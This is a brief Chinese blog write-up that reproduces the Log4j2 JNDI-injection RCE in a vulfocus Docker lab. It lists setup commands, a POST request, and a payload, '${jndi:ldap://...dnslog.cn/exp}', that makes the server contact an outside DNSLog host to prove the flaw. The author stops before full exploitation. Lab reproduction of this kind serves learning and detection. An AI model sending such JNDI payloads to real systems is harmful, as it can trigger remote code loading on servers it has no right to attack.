通过vulfocus靶场复现log4j2-rce漏洞

0、漏洞基本原理

攻击者使用 ${} 关键标识符触发 JNDI 注入漏洞,当程序将攻击者构造的payload进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

1、使用docker环境搭建靶场

docker pull vulfocus/log4j2-rce-2021-12-09

2、启动docker容器

docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

3、访问项目(172.18.19.120:55000)

image.png

4、使用DNSLog生成域名

image.png

5、构造POST请求到项目:172.18.19.120:55000/hello

image.png

6、构造参数payload

payload=${jndi:ldap://city2m.dnslog.cn/exp}

city2m.dnslog.cn为通过DNSLog生成的域名。

7、抓包进行请求重放

image.png

8、在DNSLog中观察域名的DNS解析记录

image.png

DNSLog中出现新的DNS解析记录说明我们构造的payload被服务器成功执行,证明该漏洞存在。

漏洞的进一步利用不便过多展示。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容